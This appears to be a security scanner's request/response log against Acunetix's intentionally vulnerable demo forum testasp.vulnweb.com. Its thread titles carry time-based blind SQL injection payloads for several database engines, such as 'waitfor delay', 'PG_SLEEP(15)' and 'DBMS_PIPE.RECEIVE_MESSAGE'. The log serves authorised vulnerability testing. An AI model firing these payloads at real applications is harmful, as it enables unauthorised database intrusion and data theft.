Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4137 |
Response Body - size: 4,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>showforum.asp/.</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=50 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4234 |
Response Body - size: 4,234 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum NebDWBkM')); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/NebDWBkM')); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>NebDWBkM')); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=51 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4264 |
Response Body - size: 4,264 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=52 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4267 |
Response Body - size: 4,267 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=53 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4270 |
Response Body - size: 4,270 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=54 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4309 |
Response Body - size: 4,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:58 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=55 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:44 GMT Content-Length: 4210 |
Response Body - size: 4,210 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum if(now()=sysdate(),sleep(15),0) </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/if(now()=sysdate(),sleep(15),0) </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:59 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>if(now()=sysdate(),sleep(15),0) - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to 